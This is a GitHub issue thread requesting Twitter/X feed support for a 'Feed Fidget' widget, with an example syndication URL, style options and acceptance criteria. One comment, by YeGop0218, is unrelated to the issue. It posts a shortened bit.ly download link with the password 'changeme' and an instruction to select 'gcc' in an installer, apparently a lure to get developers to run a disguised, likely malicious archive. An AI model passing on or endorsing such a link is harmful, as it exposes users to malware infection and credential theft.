### ISSUE TITLE
Add Twitter support to Feed Fidget

### ISSUE THREAD

**Issue by willyogo** [blankdotspace/space-system#370]
As a user, I want to be able to configure the Feed Fidget to display tweets from any X user.

Fortunately, Twitter provides a free endpoint that returns a beautiful feed. All we need to pass is the username.

Username Example:
https://syndication.twitter.com/srv/timeline-profile/screen-name/XDevelopers?dnt=true&embedId=twitter-widget-0&frame=false&hideBorder=true&hideFooter=false&hideHeader=false&hideScrollBar=true&lang=en&origin=https%3A%2F%2Fpublish.twitter.com%2F%23&transparent=false&widgetsVersion=2615f7e52b7e0%3A1702314776716

replace "shapeshift" with the username whose feed we want to display.

We can also give users the ability to select between 3 styles for their feed:
Dark, Light, or Transparent

If feasible, it would be great if we could override the styling of the feed with the existing Fidget Style settings (primary font & color, secondary font & color, and fidget background. If not, let's at least give users the option of Dark, Light, or Transparent.

Docs: https://developer.x.com/en/docs/x-for-websites/timelines/overview

AC:
1. A dropdown is added to the Feed Fidget that includes Farcaster and Twitter
2. If a user selects Twitter, they see a field to input a username
3. If a user inputs a username, tweets from that user populate the feed
4. A 500ms de-bounce is added to the input field for both the Farcaster inputs and X inputs so the app doesn't make a new request for every character the user types, triggering a rate limit

![Image](https://github.com/user-attachments/assets/b30560b8-a135-4ad9-8399-2f8734f2f403)

![Image](https://github.com/user-attachments/assets/ea50b741-ab75-400d-bb31-cfc408d570f3)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sktbrd** [comment]
https://github.com/Nounspace/nounspace.ts/pull/371
